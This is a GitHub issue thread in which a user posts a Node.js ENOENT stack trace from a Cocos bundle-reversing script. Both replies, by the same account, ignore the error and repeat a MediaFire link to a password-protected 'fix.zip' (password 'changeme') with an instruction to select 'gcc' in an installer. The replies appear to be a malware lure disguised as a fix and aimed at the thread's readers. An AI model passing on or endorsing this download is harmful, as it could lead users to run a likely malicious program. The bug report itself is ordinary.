### ISSUE TITLE
Error: ENOENT: no such file or directory, scandir

### ISSUE THREAD

**Issue by bigsinger** [zwq418/cocos_revert#3]
```
PS D:\Apps\XXXXXXXXXX\assets\cocos_revert-main> node reversebundle.js
node:fs:1507
  const result = binding.readdir(
                         ^

Error: ENOENT: no such file or directory, scandir 'D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\input\assets\undefined'
    at Object.readdirSync (node:fs:1507:26)
    at walkSync (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversebundle.js:10:8)
    at copyOtherFiles (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversebundle.js:102:5)
    at D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversebundle.js:40:15
    at Array.forEach (<anonymous>)
    at parseConfigs (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversebundle.js:38:17) {
  errno: -4058,
  code: 'ENOENT',
  syscall: 'scandir',
  path: 'D:\\Apps\\XXXXXXXXXX\\assets\\cocos_revert-main\\input\\assets\\undefined'
}
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
